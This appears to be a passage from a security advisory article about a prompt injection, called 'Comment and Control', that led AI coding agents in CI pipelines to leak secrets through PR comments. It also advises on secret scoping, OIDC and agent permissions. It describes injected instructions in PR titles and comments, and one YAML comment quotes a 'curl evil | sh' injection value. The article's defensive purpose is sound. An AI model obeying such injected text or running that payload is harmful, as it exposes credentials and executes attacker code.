Three AI coding agents leaked secrets through a single prompt injection. One vendor's system card predicted it

2. Insufficient runtime safeguards

Anthropic applies additional runtime protections that are not documented in its system card; OpenAI and Google document no runtime safeguards at all. Your team may be relying on vendor protections that cannot be verified and may not exist.

System cards do not detail runtime safeguards, and vendor representatives cannot clarify protections that were never documented.

Comment and Control exploited a prompt injection vulnerability in Claude Code Security Review, a feature the system card never documents as hardened against such attacks.

Request a meeting with your vendor security contact. Ask for a detailed breakdown of the runtime-level protections in place and how they defend against prompt injection attacks. Ensure this information is included in your security documentation and risk assessments.

3. Lack of external cyber defender pathway

Anthropic runs a Cyber Verification Program and OpenAI offers Trusted Access for Cyber; Google has no external cyber program at all. Neither existing program provides a pathway for external defenders to test agent-runtime attacks or prompt injection vulnerabilities.

Existing external cyber programs were not designed to address prompt injection; they do not extend to tool execution or agent-runtime testing.

Comment and Control demonstrated the cost of this gap: with no external defender pathway, agent-runtime vulnerabilities in AI coding agents remain untested and exposed.

Advocate internally for the establishment of a bug bounty program specifically targeting agent-runtime attacks and prompt injection vulnerabilities. Push vendors to create pathways for external defenders to test these attack vectors and provide feedback on security weaknesses.

4. Model-layer focus without agent-runtime checks

OpenAI documents extensive red teaming on the model layer but does not provide information on agent-runtime or tool-execution resistance metrics. Your team may be prioritizing model safety over runtime security.

Model-layer evaluations do not cover agent-runtime vulnerabilities. Red teaming focuses on model behavior, not agent actions.

The exploit in Comment and Control targeted the agent runtime, highlighting the importance of assessing runtime security alongside model safety.

Update your security assessment criteria to include evaluations of agent-runtime and tool-execution resistance. Ensure that security testing covers all aspects of AI agent security, not just model behavior.

5. Lack of prompt injection defense

Vendor system cards do not explicitly address prompt injection defense mechanisms. Your team may be unaware of the potential risks associated with prompt injection attacks on AI coding agents.

System cards do not mention prompt injection defense. Security teams may not be actively looking for this type of vulnerability.

Comment and Control exploited a prompt injection vulnerability in Claude Code Security Review, highlighting the need for explicit prompt injection defense mechanisms in AI coding agents.

Conduct a thorough review of your AI agent security posture to identify any potential vulnerabilities related to prompt injection attacks. Work with vendors to implement prompt injection defense mechanisms and ensure that your security controls are robust against such attacks.

6. Lack of clarity on runtime-level protections

Vendors do not provide detailed information on the runtime-level protections in place for AI coding agents. Your team may be operating under the assumption that these protections are sufficient without concrete evidence.

Vendor documentation does not specify runtime-level protections. Security teams may not be aware of the gaps in protection.

Comment and Control demonstrated that vendors may not have adequate runtime-level protections in place, leaving AI coding agents vulnerable to attacks.

Engage with vendors to request detailed information on the runtime-level protections implemented for AI coding agents. Perform independent testing and validation of these protections to ensure that your systems are secure against runtime-level attacks.

7. Structural gap in safeguard documentation

Vendor system cards may not accurately reflect the actual security posture of AI coding agents. Your team may be relying on incomplete or outdated information for security assessments.

System cards may not document all security measures in place. Security teams may not have visibility into gaps in safeguard documentation.

Comment and Control exposed a structural gap in safeguard documentation, highlighting the importance of verifying security claims with vendors.

Review vendor system cards and security documentation to identify any gaps or discrepancies in safeguard documentation. Request additional information from vendors to ensure that your security assessments are based on accurate and up-to-date information.

As the landscape of AI security continues to evolve, it is crucial for organizations to stay vigilant and proactive in identifying and addressing potential vulnerabilities in AI coding agents. By working closely with vendors, conducting thorough security assessments, and implementing robust security controls, organizations can mitigate the risks associated with prompt injection attacks and ensure the security of their AI systems.

CI secrets exposed to AI agents have become a significant security risk for organizations using GitHub Actions and other CI/CD runtimes. The default configuration of GitHub Actions does not properly scope secrets to individual steps, allowing all workflow steps, including AI coding agents, to access sensitive information such as API keys and production secrets. This lack of scoping leads to potential data breaches and unauthorized access to critical information.
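The scoping problem above can be sketched in a minimal workflow. This is a hypothetical example: the job names, scripts, and `PROD_API_KEY` secret are placeholders, not from any specific incident.

```yaml
# Hypothetical GitHub Actions workflow illustrating secret scoping.
name: review-and-deploy
on: pull_request

jobs:
  build:
    runs-on: ubuntu-latest
    # Risky: a job-level env makes the secret visible to EVERY step below,
    # including an AI agent step that can run arbitrary commands.
    # env:
    #   PROD_API_KEY: ${{ secrets.PROD_API_KEY }}
    steps:
      - uses: actions/checkout@v4
      - name: AI code review          # agent step receives no secrets
        run: ./scripts/run-agent-review.sh
      - name: Deploy
        run: ./scripts/deploy.sh
        env:
          # Safer: expose the secret only to the single step that needs it.
          PROD_API_KEY: ${{ secrets.PROD_API_KEY }}
```

Step-level `env` narrows the blast radius: a compromised agent step in the same job never sees the credential.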

One of the key issues is the over-permissioned agent runtimes, where AI agents are granted excessive permissions such as bash execution, git push, and API write access during setup. These permissions are rarely scoped down, leading to security vulnerabilities that can be exploited by malicious actors. It is essential for organizations to audit agent permissions repo by repo, strip unnecessary permissions, and gate write access behind human approval steps to mitigate risks.
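A least-privilege agent job with a human approval gate might look like the following sketch. The environment name, scripts, and job layout are assumptions for illustration; required reviewers are configured on the environment in repository settings.

```yaml
# Hypothetical jobs: read-only agent review, write access gated by approval.
jobs:
  agent-review:
    runs-on: ubuntu-latest
    permissions:
      contents: read          # read-only checkout; the token cannot push
      pull-requests: write    # only if the agent must post review comments
    steps:
      - uses: actions/checkout@v4
      - run: ./scripts/run-agent-review.sh

  apply-changes:
    needs: agent-review
    runs-on: ubuntu-latest
    # An environment with required reviewers forces a human approval
    # before this job (and its write-capable token) is allowed to run.
    environment: production-writes
    permissions:
      contents: write
    steps:
      - run: ./scripts/apply.sh
```

The split into two jobs matters: the agent never holds the write token, and the write path cannot start without an explicit human click.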

Furthermore, there is a lack of CVE signal for AI agent vulnerabilities, making it challenging for organizations to identify and address security flaws in these agents. Without proper CVE entries and advisories, vulnerability scanners, SIEMs, and GRC tools may not detect critical vulnerabilities in AI agents, leaving organizations exposed to potential cyber attacks. It is crucial for organizations to create a new category in their supply chain risk register for AI agent runtimes and establish regular communication with vendors to address security concerns.

Model safeguards also do not govern agent actions effectively, as safeguards primarily filter model outputs rather than agent operations. This allows AI agents to bypass safeguard evaluation and perform unauthorized actions, such as posting sensitive information in PR comments. Organizations should map every operation AI agents perform and ensure that vendors evaluate these actions before execution to enhance security measures.

Additionally, untrusted input parsed as instructions poses a significant risk, as AI coding agents may misinterpret injected instructions in PR titles, body text, and comments. Implementing input sanitization as defense-in-depth and restricting agent context to approved workflow configurations can help prevent malicious attacks through untrusted inputs. Security teams should also request quantified injection resistance rates from vendors to ensure AI safety metrics are transparent and comparable across different platforms.
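The injection path through PR text is concrete in GitHub Actions: expression interpolation inside a `run` block expands attacker-controlled fields before the shell executes. A minimal sketch of the risky and safer forms:

```yaml
# Hypothetical step showing the classic script-injection pattern.
steps:
  # Risky: ${{ github.event.pull_request.title }} is expanded into the
  # script before the shell runs, so a title like `"; curl evil | sh`
  # executes as commands.
  # - run: echo "Reviewing ${{ github.event.pull_request.title }}"

  # Safer: the title arrives as an environment variable and is never
  # re-parsed as shell; it stays inert data.
  - name: Log PR title
    env:
      PR_TITLE: ${{ github.event.pull_request.title }}
    run: echo "Reviewing $PR_TITLE"
```

The same env-var indirection applies to PR body text, comments, and branch names before any of them reach an agent or a shell.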

In conclusion, organizations must address the security risks of CI secrets exposed to AI agents by implementing proper access controls, auditing permissions, establishing vendor communication channels, and strengthening input sanitization. Proactively hardening AI agent runtimes protects sensitive data from unauthorized access and exploitation.

Before your next vendor renewal, focus on building a robust control architecture rather than standardizing on a specific model. This advice from Baer emphasizes maintaining portability so you can swap models without compromising your security posture. Key steps to take in preparation for that renewal:

  1. Build a deployment map: Catalog where AI coding agents run and confirm each platform provides the necessary runtime protections. Ask your vendor to clarify which runtime-level prompt injection protections apply to your deployment surface.
  2. Audit every runner for secret exposure: Conduct a thorough audit across all repositories with AI coding agents to identify any exposed secrets. Rotate all exposed credentials to enhance security.
  3. Start migrating credentials to OIDC tokens: Consider switching stored secrets to short-lived OIDC token issuance. Platforms like GitHub Actions, GitLab CI, and CircleCI support OIDC federation. Plan a gradual rollout over one to two quarters, beginning with repositories running AI agents.
  4. Fix agent permissions repo by repo: Remove bash execution permissions from AI agents involved in code review and set repository access to read-only. Implement a human approval step to gate write access.
  5. Add input sanitization as a layer of protection: Filter pull request titles, comments, and review threads for instruction patterns before they reach AI agents. Combine this with least-privilege permissions and OIDC for enhanced security.
  6. Include "AI agent runtime" in your supply chain risk register: Establish a 48-hour patch verification cadence with each vendor’s security contact. Stay proactive in addressing vulnerabilities and do not solely rely on CVEs.
  7. Review existing GitHub Actions mitigations: Ensure that your GitHub Actions configurations include key security measures such as restricted GITHUB_TOKEN scope, environment protection rules, and first-time-contributor gates to prevent unauthorized access.
  8. Prepare procurement questions for vendors: Prior to your next renewal, ask vendors to demonstrate their quantified injection resistance rate for the specific model version running on your deployment platform. Document refusals for compliance with the EU AI Act deadline in August 2026.
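Steps 3 and 7 can be sketched in one workflow: short-lived OIDC credentials in place of stored secrets, plus a restricted default `GITHUB_TOKEN`. This is a hypothetical AWS example; the role ARN, region, and scripts are placeholders, and the same federation pattern exists for other clouds.

```yaml
# Hypothetical deploy workflow using OIDC instead of stored secrets.
name: deploy
on:
  push:
    branches: [main]

permissions:
  contents: read      # restrict the default GITHUB_TOKEN to read-only
  id-token: write     # allow the job to request a short-lived OIDC token

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Assume cloud role via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/ci-deploy
          aws-region: us-east-1
      - run: ./scripts/deploy.sh   # uses short-lived credentials; nothing to leak from secret storage
```

With this shape, there is no long-lived credential for an over-permissioned agent to exfiltrate: the cloud issues a token scoped to this workflow run and it expires on its own.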

By following these steps and maintaining a proactive approach to security, you can strengthen your defenses against vulnerabilities in AI coding agents operating in CI/CD runtimes. Remember, it is the subtle weaknesses, like composability and over-permissioned agents, that often pose the greatest risk to your system's security. Stay vigilant and prioritize security measures to safeguard your organization's data and operations.
